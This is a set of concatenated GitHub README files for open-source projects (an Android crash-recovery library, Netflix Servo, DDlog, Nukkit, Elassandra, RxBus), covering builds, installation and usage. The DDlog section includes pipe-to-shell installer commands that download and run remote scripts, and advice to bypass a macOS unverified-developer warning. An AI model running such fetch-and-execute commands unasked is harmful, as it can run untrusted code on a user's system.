> 4. RESTART_AND_CLEAR - Restart the app and clear its data

## **Callback**

```java
public interface RecoveryCallback {
    void stackTrace(String stackTrace);
    void cause(String cause);
    void exception(
        String throwExceptionType,
        String throwClassName,
        String throwMethodName,
        int throwLineNumber
    );
    void throwable(Throwable throwable);
}
```

## **Custom Theme**

You can customize the UI by setting these properties in your styles file:

```xml
<color name="recovery_colorPrimary">#2E2E36</color>
<color name="recovery_colorPrimaryDark">#2E2E36</color>
<color name="recovery_colorAccent">#BDBDBD</color>
<color name="recovery_background">#3C4350</color>
<color name="recovery_textColor">#FFFFFF</color>
<color name="recovery_textColor_sub">#C6C6C6</color>
```

## **Crash File Path**

> {SDCard Dir}/Android/data/{packageName}/files/recovery_crash/

----

## **Update history**

* `VERSION-0.0.5`——**Support silent recovery**
* `VERSION-0.0.6`——**Strengthen the protection of silent restore mode**
* `VERSION-0.0.7`——**Add obfuscation configuration**
* `VERSION-0.0.8`——**Add the skip-Activity feature, method: skip()**
* `VERSION-0.0.9`——**Update the UI and solve some problems**
* `VERSION-0.1.0`——**Optimize crash exception delivery; Recovery can now be initialized from anywhere; release the official version 0.1.0**
* `VERSION-0.1.3`——**Add 'no-op' support**
* `VERSION-0.1.4`——**Update default theme**
* `VERSION-0.1.5`——**Fix 8.0+ hook bug**
* `VERSION-0.1.6`——**Update**
* `VERSION-1.0.0`——**Fix 8.0 compatibility issue**

## **About**

* **Blog**: [https://zhengxiaoyong.com](https://zhengxiaoyong.com)
* **Wechat**:

![](https://raw.githubusercontent.com/Sunzxyong/ImageRepository/master/qrcode.jpg)

# **LICENSE**

```
Copyright 2016 zhengxiaoyong

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

   http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```
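For illustration, a minimal sketch of the `MyCrashCallback` referenced in the initialization snippet above (the logging choice is an assumption for this sketch; it simply implements the `RecoveryCallback` interface shown earlier):

```java
import android.util.Log;

public class MyCrashCallback implements RecoveryCallback {
    @Override
    public void stackTrace(String stackTrace) {
        Log.e("Recovery", "stackTrace: " + stackTrace);
    }

    @Override
    public void cause(String cause) {
        Log.e("Recovery", "cause: " + cause);
    }

    @Override
    public void exception(String throwExceptionType, String throwClassName,
                          String throwMethodName, int throwLineNumber) {
        Log.e("Recovery", "crash in " + throwClassName + "#" + throwMethodName
                + " (line " + throwLineNumber + "): " + throwExceptionType);
    }

    @Override
    public void throwable(Throwable throwable) {
        // forward to your crash-reporting tool here if desired
    }
}
```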
0
Netflix/servo
Netflix Application Monitoring Library
null
# DEPRECATED

This project receives minimal maintenance to keep software that relies on it working. There is no active development or planned feature improvement. For any new projects it is recommended to use the [Spectator] library instead. For more details see the [Servo comparison] page in the Spectator docs.

[Spectator]: https://github.com/Netflix/spectator
[Servo comparison]: http://netflix.github.io/spectator/en/latest/intro/servo-comparison/

# No-Op Registry

As of version 0.13.0, the default monitor registry is a no-op implementation to minimize the overhead for legacy apps that still happen to have some usage of Servo. If the previous behavior is needed, then set the following system property:

```
com.netflix.servo.DefaultMonitorRegistry.registryClass=com.netflix.servo.jmx.JmxMonitorRegistry
```

# Servo: Application Metrics in Java

> servo v. : WATCH OVER, OBSERVE
> Latin.

Servo provides a simple interface for exposing and publishing application metrics in Java. The primary goals are:

* **Leverage JMX**: JMX is the standard monitoring interface for Java and can be queried by many existing tools.
* **Keep It Simple**: It should be trivial to expose metrics and publish metrics without having to write lots of code such as [MBean interfaces](http://docs.oracle.com/javase/tutorial/jmx/mbeans/standard.html).
* **Flexible Publishing**: Once metrics are exposed, it should be easy to regularly poll the metrics and make them available for internal reporting systems, logs, and services like [Amazon CloudWatch](http://aws.amazon.com/cloudwatch/).

This has already been implemented inside of Netflix and most of our applications currently use it.

## Project Details

### Build Status

[![Build Status](https://travis-ci.org/Netflix/servo.svg)](https://travis-ci.org/Netflix/servo/builds)

### Versioning

Servo is released with a 0.X.Y version because it has not yet reached full API stability. Given a version number MAJOR.MINOR.PATCH, increment the:

* MINOR version when there are binary incompatible changes, and
* PATCH version when new functionality or bug fixes are backwards compatible.

### Documentation

* [GitHub Wiki](https://github.com/Netflix/servo/wiki)
* [Javadoc](http://netflix.github.io/servo/current/servo-core/docs/javadoc/)

### Communication

* Google Group: [Netflix Atlas](https://groups.google.com/forum/#!forum/netflix-atlas)
* For bugs, feedback, questions and discussion please use [GitHub Issues](https://github.com/Netflix/servo/issues).
* If you want to help contribute to the project, see [CONTRIBUTING.md](https://github.com/Netflix/servo/blob/master/CONTRIBUTING.md) for details.

## Project Usage

### Build

To build the Servo project:

```
$ git clone https://github.com/Netflix/servo.git
$ cd servo
$ ./gradlew build
```

More details can be found on the [Getting Started](https://github.com/Netflix/servo/wiki/Getting-Started) page of the wiki.

### Binaries

Binaries and dependency information can be found at [Maven Central](http://search.maven.org/#search%7Cga%7C1%7Ccom.netflix.servo).

Maven Example:

```
<dependency>
    <groupId>com.netflix.servo</groupId>
    <artifactId>servo-core</artifactId>
    <version>0.12.7</version>
</dependency>
```

Ivy Example:

```
<dependency org="com.netflix.servo" name="servo-core" rev="0.12.7" />
```

## License

Copyright 2012-2016 Netflix, Inc.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at:

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
vmware/differential-datalog
DDlog is a programming language for incremental computation. It is well suited for writing programs that continuously update their output in response to input changes. A DDlog programmer does not write incremental algorithms; instead they specify the desired input-output mapping in a declarative manner.
datalog ddlog incremental programming-language rust
[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT) [![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions) [![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master) [![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html) [![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog)

# Differential Datalog (DDlog)

DDlog is a programming language for *incremental computation*. It is well suited for writing programs that continuously update their output in response to input changes. With DDlog, the programmer does not need to worry about writing incremental algorithms. Instead they specify the desired input-output mapping in a declarative manner, using a dialect of Datalog. The DDlog compiler then synthesizes an efficient incremental implementation. DDlog is based on [Frank McSherry's](https://github.com/frankmcsherry/) excellent [differential dataflow](https://github.com/TimelyDataflow/differential-dataflow) library.

DDlog has the following key properties:

1. **Relational**: A DDlog program transforms a set of input relations (or tables) into a set of output relations. It is thus well suited for applications that operate on relational data, ranging from real-time analytics to cloud management systems and static program analysis tools.

2. **Dataflow-oriented**: At runtime, a DDlog program accepts a *stream of updates* to input relations. Each update inserts, deletes, or modifies a subset of input records. DDlog responds to an input update by outputting an update to its output relations.

3. **Incremental**: DDlog processes input updates by performing the minimum amount of work necessary to compute changes to output relations. This has significant performance benefits for many queries.

4. **Bottom-up**: DDlog starts from a set of input facts and computes *all* possible derived facts by following user-defined rules, in a bottom-up fashion. In contrast, top-down engines are optimized to answer individual user queries without computing all possible facts ahead of time. For example, given a Datalog program that computes pairs of connected vertices in a graph (a sketch of this program appears after the Installation section below), a bottom-up engine maintains the set of all such pairs. A top-down engine, on the other hand, is triggered by a user query to determine whether a pair of vertices is connected and handles the query by searching for a derivation chain back to ground facts. The bottom-up approach is preferable in applications where all derived facts must be computed ahead of time and in applications where the cost of initial computation is amortized across a large number of queries.

5. **In-memory**: DDlog stores and processes data in memory. In a typical use case, a DDlog program is used in conjunction with a persistent database, with database records being fed to DDlog as ground facts and the derived facts computed by DDlog being written back to the database. At the moment, DDlog can only operate on databases that completely fit in the memory of a single machine. We are working on a distributed version of DDlog that will be able to partition its state and computation across multiple machines.
6. **Typed**: In its classical textbook form, Datalog is more of a mathematical formalism than a practical tool for programmers. In particular, pure Datalog does not have concepts like types, arithmetic, strings or functions. To facilitate writing of safe, clear, and concise code, DDlog extends pure Datalog with:

   1. A powerful type system, including Booleans, unlimited precision integers, bitvectors, floating point numbers, strings, tuples, tagged unions, vectors, sets, and maps. All of these types can be stored in DDlog relations and manipulated by DDlog rules. Thus, with DDlog one can perform relational operations, such as joins, directly over structured data, without having to flatten it first (as is often done in SQL databases).

   2. Standard integer, bitvector, and floating point arithmetic.

   3. A simple procedural language that allows expressing many computations natively in DDlog without resorting to external functions.

   4. String operations, including string concatenation and interpolation.

   5. Syntactic sugar for writing imperative-style code using for/let/assignments.

7. **Integrated**: While DDlog programs can be run interactively via a command line interface, its primary use case is to integrate with other applications that require deductive database functionality. A DDlog program is compiled into a Rust library that can be linked against a Rust, C/C++, Java, or Go program (bindings for other languages can be easily added). This enables good performance, but somewhat limits the flexibility, as changes to the relational schema or rules require re-compilation.

## Documentation

- Follow the [tutorial](doc/tutorial/tutorial.md) for a step-by-step introduction to DDlog.
- DDlog [language reference](doc/language_reference/language_reference.md).
- DDlog [command reference](doc/command_reference/command_reference.md) for writing and testing your own Datalog programs.
- [How to](doc/java_api.md) use DDlog from Java.
- [How to](doc/c_tutorial/c_tutorial.rst) use DDlog from C.
- [How to](go/README.md) use DDlog from Go and [Go API documentation](https://pkg.go.dev/github.com/vmware/differential-datalog/go/pkg/ddlog).
- [How to](test/datalog_tests/rust_api_test) use DDlog from Rust (by example).
- [Tutorial](doc/profiling/profiling.md) on profiling DDlog programs.
- [DDlog overview paper](doc/datalog2.0-workshop/paper.pdf), Datalog 2.0 workshop, 2019.

## Installation

### Installing DDlog from a binary release

To install a precompiled version of DDlog, download the [latest binary release](https://github.com/vmware/differential-datalog/releases), extract it from the archive, add `ddlog/bin` to your `$PATH`, and set `$DDLOG_HOME` to point to the `ddlog` directory. You will also need to install the Rust toolchain (see instructions below).

If you're using OS X, you will need to override the binary's security settings through [these instructions](https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac). Otherwise, when first running the DDlog compiler (through calling `ddlog`), you will get the following warning dialog:

```
"ddlog" cannot be opened because the developer cannot be verified.
macOS cannot verify that this app is free from malware.
```

You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md).
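As a first taste of the language, here is a minimal sketch of the connected-vertices program mentioned under **Bottom-up** above (relation and field names are illustrative; see the tutorial for the full syntax):

```
input relation Edge(src: string, dst: string)
output relation Path(src: string, dst: string)

// Every edge is a path.
Path(x, y) :- Edge(x, y).
// Any path extended by an edge is also a path.
Path(x, z) :- Path(x, y), Edge(y, z).
```

As inputs to `Edge` are inserted or deleted, DDlog incrementally updates the set of `Path` facts rather than recomputing it from scratch.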
### Compiling DDlog from sources

#### Installing dependencies manually

- Haskell [stack](https://github.com/commercialhaskell/stack):
  ```
  wget -qO- https://get.haskellstack.org/ | sh
  ```
- Rust toolchain v1.52.1 or later:
  ```
  curl https://sh.rustup.rs -sSf | sh
  . $HOME/.cargo/env
  rustup component add rustfmt
  rustup component add clippy
  ```
  **Note:** The `rustup` script adds the path to the Rust toolchain binaries (typically, `$HOME/.cargo/bin`) to `~/.profile`, so that it becomes effective at the next login. To configure your current shell, run `source $HOME/.cargo/env`.
- JDK, e.g.:
  ```
  apt install default-jdk
  ```
- Google FlatBuffers library. Download and build FlatBuffers release 1.11.0 from [github](https://github.com/google/flatbuffers/releases/tag/v1.11.0). Make sure that the `flatc` tool is in your `$PATH`. Additionally, make sure that FlatBuffers Java classes are in your `$CLASSPATH`:
  ```
  ./tools/install-flatbuf.sh
  cd flatbuffers
  export CLASSPATH=`pwd`"/java":$CLASSPATH
  export PATH=`pwd`:$PATH
  cd ..
  ```
- Static versions of the following libraries: `libpthread.a`, `libc.a`, `libm.a`, `librt.a`, `libutil.a`, `libdl.a`, `libgmp.a`, and `libstdc++.a`. These can be installed from distro-specific packages. On Ubuntu:
  ```
  apt install libc6-dev libgmp-dev
  ```
  On Fedora:
  ```
  dnf install glibc-static gmp-static libstdc++-static
  ```

#### Building

To build the software once you've installed the dependencies using one of the above methods, clone this repository and set the `$DDLOG_HOME` variable to point to the root of the repository. Run

```
stack build
```

anywhere inside the repository to build the DDlog compiler.

To install DDlog binaries in Haskell stack's default binary directory:

```
stack install
```

To install to a different location:

```
stack install --local-bin-path <custom_path>
```

To test basic DDlog functionality:

```
stack test --ta '-p path'
```

**Note:** this takes a few minutes.

You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md).

### vim syntax highlighting

The easiest way to enable differential datalog syntax highlighting for `.dl` files in Vim is by creating a symlink from `<ddlog-folder>/tools/vim/syntax/dl.vim` into `~/.vim/syntax/`. If you are using a plugin manager, you may be able to consume the file directly from the upstream repository as well. In the case of [`Vundle`](https://github.com/VundleVim/Vundle.vim), for example, the configuration could look as follows:

```vim
call vundle#begin('~/.config/nvim/bundle')
...
Plugin 'vmware/differential-datalog', {'rtp': 'tools/vim'} <---- relevant line
...
call vundle#end()
```

## Debugging with GHCi

To run the test suite with the GHCi debugger:

```
stack ghci --ghci-options -isrc --ghci-options -itest differential-datalog:differential-datalog-test
```

and type `do main` in the command prompt.

## Building with profiling info enabled

```
stack clean
```

followed by

```
stack build --profile
```

or

```
stack test --profile
```
0
CloudburstMC/Nukkit
Cloudburst Nukkit - Nuclear-Powered Minecraft: Bedrock Edition Server Software
bedrock bedrock-edition bedrock-engine java mcbe mcbe-server mcpe mcpe-server minecraft minecraft-server nukkit pocket-edition
![nukkit](.github/images/banner.png)

[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](LICENSE) [![Build Status](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/badge/icon)](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/) [![Discord](https://img.shields.io/discord/393465748535640064.svg)](https://discord.gg/5PzMkyK)

Introduction
-------------

Nukkit is nuclear-powered server software for Minecraft: Pocket Edition. It has a few key advantages over other server software:

* Written in Java, Nukkit is faster and more stable.
* Having a friendly structure, it's easy to contribute to Nukkit's development and rewrite plugins from other platforms into Nukkit plugins.

Nukkit is still **under development**; we welcome contributions.

Links
--------------------

* __[News](https://nukkitx.com)__
* __[Forums](https://nukkitx.com/forums)__
* __[Discord](https://discord.gg/5PzMkyK)__
* __[Download](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master)__
* __[Plugins](https://nukkitx.com/resources/categories/nukkit-plugins.1)__
* __[Wiki](https://nukkitx.com/wiki/nukkit)__

Contributing
-------------

Please read the [CONTRIBUTING](.github/CONTRIBUTING.md) guide before submitting any issue. Issues with insufficient information or in the wrong format will be closed and will not be reviewed.

Build JAR file
-------------

- `git clone https://github.com/CloudburstMC/Nukkit`
- `cd Nukkit`
- `git submodule update --init`
- `./gradlew shadowJar`

The compiled JAR can be found in the `target/` directory.

Running
-------------

Simply run `java -jar nukkit-1.0-SNAPSHOT.jar`.

Plugin API
-------------

Information on Nukkit's API can be found at the [wiki](https://nukkitx.com/wiki/nukkit/).

Docker
-------------

Running Nukkit in [Docker](https://www.docker.com/) (version 17.05 or higher).

Build the image from source:

```
docker build -t nukkit .
```

Run once to generate the `nukkit-data` volume with default settings and to choose the language:

```
docker run -it -p 19132:19132/udp -v nukkit-data:/data nukkit
```

Docker Compose
-------------

Use [docker-compose](https://docs.docker.com/compose/overview/) to start the server on port `19132` with the `nukkit-data` volume:

```
docker-compose up -d
```

Kubernetes & Helm
-------------

Validate the chart: `helm lint charts/nukkit`

Dry run and print out rendered YAML: `helm install --dry-run --debug nukkit charts/nukkit`

Install the chart: `helm install nukkit charts/nukkit`

Or, with some different values:

```
helm install nukkit \
  --set image.tag="arm64" \
  --set service.type="LoadBalancer" \
  charts/nukkit
```

Or, the same but with custom values from a file:

```
helm install nukkit \
  -f helm-values.local.yaml \
  charts/nukkit
```

Upgrade the chart: `helm upgrade nukkit charts/nukkit`

Testing after deployment: `helm test nukkit`

Completely remove the chart: `helm uninstall nukkit`
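To complement the Plugin API pointer above, here is a minimal hedged sketch of a plugin's main class (the class name and messages are illustrative; `cn.nukkit.plugin.PluginBase` is Nukkit's plugin base class, but consult the wiki for the full plugin layout, including the required plugin.yml):

```java
package com.example.nukkit; // illustrative package name

import cn.nukkit.plugin.PluginBase;

public class ExamplePlugin extends PluginBase {

    @Override
    public void onEnable() {
        // Runs when the server enables the plugin.
        this.getLogger().info("ExamplePlugin enabled!");
    }

    @Override
    public void onDisable() {
        // Runs when the server shuts down or the plugin is disabled.
        this.getLogger().info("ExamplePlugin disabled!");
    }
}
```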
0
strapdata/elassandra
Elassandra = Elasticsearch + Apache Cassandra
aggregation cassandra completion elasticsearch fuzzy-search kibana logstash lucene masterless mission-critical nosql rest-api search spark
# Elassandra

[![Build Status](https://travis-ci.org/strapdata/elassandra.svg)](https://travis-ci.org/strapdata/elassandra) [![Documentation Status](https://readthedocs.org/projects/elassandra/badge/?version=latest)](https://elassandra.readthedocs.io/en/latest/?badge=latest) [![GitHub release](https://img.shields.io/github/v/release/strapdata/elassandra.svg)](https://github.com/strapdata/elassandra/releases/latest) [![Twitter](https://img.shields.io/twitter/follow/strapdataio?style=social)](https://twitter.com/strapdataio)

![Elassandra Logo](elassandra-logo.png)

## [http://www.elassandra.io/](http://www.elassandra.io/)

Elassandra is an [Apache Cassandra](http://cassandra.apache.org) distribution including an [Elasticsearch](https://github.com/elastic/elasticsearch) search engine. Elassandra is a multi-master, multi-cloud database and search engine with support for replicating across multiple datacenters in active/active mode. Elasticsearch code is embedded in Cassandra nodes, providing advanced search features on Cassandra tables, and Cassandra serves as an Elasticsearch data and configuration store.

![Elassandra architecture](/docs/elassandra/source/images/elassandra1.jpg)

Elassandra supports Cassandra vnodes and scales horizontally by adding more nodes without the need to reshard indices.

Project documentation is available at [doc.elassandra.io](http://doc.elassandra.io).

## Benefits of Elassandra

For Cassandra users, Elassandra provides Elasticsearch features:

* Cassandra updates are indexed in Elasticsearch.
* Full-text and spatial search on your Cassandra data.
* Real-time aggregation (does not require Spark or Hadoop to GROUP BY).
* Search across multiple keyspaces and tables in one query.
* Automatic schema creation and support for nested documents using [User Defined Types](https://docs.datastax.com/en/cql/3.1/cql/cql_using/cqlUseUDT.html).
* Read/write JSON REST access to Cassandra data.
* Numerous Elasticsearch plugins and products like [Kibana](https://www.elastic.co/guide/en/kibana/current/introduction.html).
* Manages concurrent Elasticsearch mapping changes and applies batched atomic CQL schema changes.
* Support for [Elasticsearch ingest processors](https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html), allowing input data to be transformed.

For Elasticsearch users, Elassandra provides useful features:

* Elassandra is masterless. Cluster state is managed through [cassandra lightweight transactions](http://www.datastax.com/dev/blog/lightweight-transactions-in-cassandra-2-0).
* Elassandra is a sharded multi-master database, where Elasticsearch is sharded master-slave. Thus, Elassandra has no single point of write, helping to achieve high availability.
* Elassandra inherits Cassandra data repair mechanisms (hinted handoff, read repair and nodetool repair), providing support for **cross-datacenter replication**.
* When adding a node to an Elassandra cluster, only data pulled from existing nodes is re-indexed in Elasticsearch.
* Cassandra can be your unique datastore for indexed and non-indexed data. It's easier to manage and secure. Source documents are now stored in Cassandra, reducing disk space if you need both a NoSQL database and Elasticsearch.
* Write operations are not restricted to one primary shard, but distributed across all Cassandra nodes in a virtual datacenter. The number of shards does not limit your write throughput. Adding Elassandra nodes increases both read and write throughput.
* Elasticsearch indices can be replicated among many Cassandra datacenters, allowing writes to the closest datacenter and global search.
* The [cassandra driver](http://www.planetcassandra.org/client-drivers-tools/) is datacenter- and token-aware, providing automatic load-balancing and failover.
* Elassandra efficiently stores Elasticsearch documents in binary SSTables without any JSON overhead.

## Quick start

* [Quick Start](http://doc.elassandra.io/en/latest/quickstart.html) guide to run a single-node Elassandra cluster in docker.
* [Deploy Elassandra by launching a Google Kubernetes Engine](./docs/google-kubernetes-tutorial.md):

[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/strapdata/elassandra-google-k8s-marketplace&tutorial=docs/google-kubernetes-tutorial.md)

## Upgrade Instructions

#### Elassandra 6.8.4.2+

Since version 6.8.4.2, the gossip X1 application state can be compressed using a system property. Enabling this setting allows the creation of a lot of virtual indices. Before enabling this setting, upgrade all the 6.8.4.x nodes to 6.8.4.2 (or higher). Once all the nodes are on 6.8.4.2, they are able to decompress the application state even if the setting isn't yet configured locally.

#### Elassandra 6.2.3.25+

Elassandra uses the Cassandra GOSSIP protocol to manage the Elasticsearch routing table, and Elassandra 6.8.4.2+ adds support for compression of the X1 application state to increase the maximum number of Elasticsearch indices. For backward compatibility, the compression is disabled by default, but once all your nodes are upgraded to version 6.8.4.2+, you should enable the X1 compression by adding **-Des.compress_x1=true** in your **conf/jvm.options** and rolling-restarting all nodes. Nodes running version 6.8.4.2+ are able to read both compressed and uncompressed X1.

#### Elassandra 6.2.3.21+

Before version 6.2.3.21, the Cassandra replication factor for the **elastic_admin** keyspace (and elastic_admin_[datacenter.group]) was automatically adjusted to the number of nodes in the datacenter. Since version 6.2.3.21, and because that had a performance impact on large clusters, it's now up to your Elassandra administrator to properly adjust the replication factor for this keyspace. Keep in mind that Elasticsearch mapping updates rely on a PAXOS transaction that requires QUORUM nodes to succeed, so the replication factor should be at least 3 on each datacenter (a CQL sketch follows below).

#### Elassandra 6.2.3.19+

Elassandra 6.2.3.19 metadata versioning now relies on the Cassandra table **elastic_admin.metadata_log** (which was **elastic_admin.metadata** from 6.2.3.8 to 6.2.3.18) to keep the elasticsearch mapping update history and automatically recover from a possible PAXOS write timeout issue.

When upgrading the first node of a cluster, Elassandra automatically copies the current **metadata.version** into the new **elastic_admin.metadata_log** table. To avoid Elasticsearch mapping inconsistency, you must avoid mapping updates while the rolling upgrade is in progress. Once all nodes are upgraded, **elastic_admin.metadata** is no longer used and can be removed. You can then get the mapping update history from the new **elastic_admin.metadata_log** and see which node updated the mapping, when, and for what reason.
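Returning to the 6.2.3.21+ note above, a minimal CQL sketch of such an adjustment (the datacenter name `DC1` and the factor are illustrative; use your own topology):

```CQL
ALTER KEYSPACE elastic_admin
  WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '3'};
```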
#### Elassandra 6.2.3.8+

Elassandra 6.2.3.8+ now fully manages the elasticsearch mapping in the CQL schema through the use of CQL schema extensions (see *system_schema.tables*, column *extensions*). These table extensions and the CQL schema updates resulting from elasticsearch index creation/modification are applied in batched atomic schema updates to ensure consistency when concurrent updates occur. Moreover, these extensions are stored in binary and support partial updates to be more efficient. As a result, the elasticsearch mapping is no longer stored in the *elastic_admin.metadata* table.

WARNING: During the rolling upgrade, elasticsearch mapping changes are not propagated between nodes running the new and the old versions, so don't change your mapping while you're upgrading. Once all your nodes have been upgraded to 6.2.3.8+ and validated, apply the following CQL statements to remove useless elasticsearch metadata:

```bash
ALTER TABLE elastic_admin.metadata DROP metadata;
ALTER TABLE elastic_admin.metadata WITH comment = '';
```

WARNING: Due to the CQL table extensions used by Elassandra, some old versions of **cqlsh** may lead to the following error message: **"'module' object has no attribute 'viewkeys'."** This comes from the old python cassandra driver embedded in Cassandra and has been reported in [CASSANDRA-14942](https://issues.apache.org/jira/browse/CASSANDRA-14942). Possible workarounds:

* Use the **cqlsh** embedded with Elassandra
* Install a recent version of the **cqlsh** utility (*pip install cqlsh*) or run it from a docker image:

```bash
docker run -it --rm strapdata/cqlsh:0.1 node.example.com
```

#### Elassandra 6.x changes

* Elasticsearch now supports only one document type per index, backed by one Cassandra table. Unless you specify an elasticsearch type name in your mapping, data is stored in a cassandra table named **"_doc"**. If you want to search many cassandra tables, you now need to create and search many indices.
* Elasticsearch 6.x manages shard consistency through several metadata fields (_primary_term, _seq_no, _version) that are not used in elassandra because replication is fully managed by cassandra.

## Installation

Ensure Java 8 is installed and `JAVA_HOME` points to the correct location.

* [Download](https://github.com/strapdata/elassandra/releases) and extract the distribution tarball
* Define the CASSANDRA_HOME environment variable: `export CASSANDRA_HOME=<extracted_directory>`
* Run `bin/cassandra -e`
* Run `bin/nodetool status`
* Run `curl -XGET localhost:9200/_cluster/state`

#### Example

Try indexing a document on a non-existing index:

```bash
curl -XPUT 'http://localhost:9200/twitter/_doc/1?pretty' -H 'Content-Type: application/json' -d '{
  "user": "Poulpy",
  "post_date": "2017-10-04T13:12:00Z",
  "message": "Elassandra adds dynamic mapping to Cassandra"
}'
```

Then look it up in Cassandra:

```bash
bin/cqlsh -e "SELECT * from twitter.\"_doc\""
```

Behind the scenes, Elassandra has created a new keyspace `twitter` and table `_doc`.
```CQL admin@cqlsh>DESC KEYSPACE twitter; CREATE KEYSPACE twitter WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true; CREATE TABLE twitter."_doc" ( "_id" text PRIMARY KEY, message list<text>, post_date list<timestamp>, user list<text> ) WITH bloom_filter_fp_chance = 0.01 AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'} AND comment = '' AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'} AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'} AND crc_check_chance = 1.0 AND dclocal_read_repair_chance = 0.1 AND default_time_to_live = 0 AND gc_grace_seconds = 864000 AND max_index_interval = 2048 AND memtable_flush_period_in_ms = 0 AND min_index_interval = 128 AND read_repair_chance = 0.0 AND speculative_retry = '99PERCENTILE'; CREATE CUSTOM INDEX elastic__doc_idx ON twitter."_doc" () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex'; ``` By default, multi-valued Elasticsearch fields are mapped to Cassandra lists. Now, insert a row with CQL: ```CQL INSERT INTO twitter."_doc" ("_id", user, post_date, message) VALUES ( '2', ['Jimmy'], [dateof(now())], ['New data is indexed automatically']); SELECT * FROM twitter."_doc"; _id | message | post_date | user -----+--------------------------------------------------+-------------------------------------+------------ 2 | ['New data is indexed automatically'] | ['2019-07-04 06:00:21.893000+0000'] | ['Jimmy'] 1 | ['Elassandra adds dynamic mapping to Cassandra'] | ['2017-10-04 13:12:00.000000+0000'] | ['Poulpy'] (2 rows) ``` Then search for it with the Elasticsearch API: ```bash curl "localhost:9200/twitter/_search?q=user:Jimmy&pretty" ``` And here is a sample response: ```JSON { "took" : 3, "timed_out" : false, "_shards" : { "total" : 1, "successful" : 1, "skipped" : 0, "failed" : 0 }, "hits" : { "total" : 1, "max_score" : 0.6931472, "hits" : [ { "_index" : "twitter", "_type" : "_doc", "_id" : "2", "_score" : 0.6931472, "_source" : { "post_date" : "2019-07-04T06:00:21.893Z", "message" : "New data is indexed automatically", "user" : "Jimmy" } } ] } } ``` ## Support * Commercial support is available through [Strapdata](http://www.strapdata.com/). * Community support is available via [elassandra google groups](https://groups.google.com/forum/#!forum/elassandra). * Post feature requests and bugs on https://github.com/strapdata/elassandra/issues ## License ``` This software is licensed under the Apache License, version 2 ("ALv2"), quoted below. Copyright 2015-2018, Strapdata (contact@strapdata.com). Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ``` ## Acknowledgments * Elasticsearch, Logstash, Beats and Kibana are trademarks of Elasticsearch BV, registered in the U.S. and in other countries. * Apache Cassandra, Apache Lucene, Apache, Lucene and Cassandra are trademarks of the Apache Software Foundation. * Elassandra is a trademark of Strapdata SAS.
0
AndroidKnife/RxBus
Event Bus By RxJava.
rxandroid rxbus rxjava rxjava2
RxBus - An event bus by [ReactiveX/RxJava](https://github.com/ReactiveX/RxJava)/[ReactiveX/RxAndroid](https://github.com/ReactiveX/RxAndroid) ============================= This is an event bus designed to allow your application to communicate efficiently. I have used it in many projects, and I think others may find it useful too, so I am publishing it. RxBus supports annotations (@Produce/@Subscribe), and it lets you produce/subscribe on another thread such as MAIN_THREAD, NEW_THREAD, IO, COMPUTATION, TRAMPOLINE, IMMEDIATE, or even an EXECUTOR or HANDLER thread; more in [EventThread](rxbus/src/main/java/com/hwangjr/rxbus/thread/EventThread.java). RxBus also provides event tags to define events: the method's first (and only) parameter, together with the tag, defines the event type. **Thanks to:** [square/otto](https://github.com/square/otto) [greenrobot/EventBus](https://github.com/greenrobot/EventBus) Usage -------- Just 2 Steps: **STEP 1** Add the dependency to your Gradle file: ```groovy compile 'com.hwangjr.rxbus:rxbus:3.0.0' ``` Or Maven: ``` xml <dependency> <groupId>com.hwangjr.rxbus</groupId> <artifactId>rxbus</artifactId> <version>3.0.0</version> <type>aar</type> </dependency> ``` **TIP:** If you also use [JakeWharton/timber](https://github.com/JakeWharton/timber) to log your messages, you may need to exclude timber (from version 1.0.4, the timber dependency moved from [AndroidKnife/Utils/timber](https://github.com/AndroidKnife/Utils/tree/master/timber) to JakeWharton's): ``` groovy compile ('com.hwangjr.rxbus:rxbus:3.0.0') { exclude group: 'com.jakewharton.timber', module: 'timber' } ``` Snapshots of the development version are available in [Sonatype's `snapshots` repository](https://oss.sonatype.org/content/repositories/snapshots/). **STEP 2** Just use the provided bus (any-thread enforcement): ``` java com.hwangjr.rxbus.RxBus 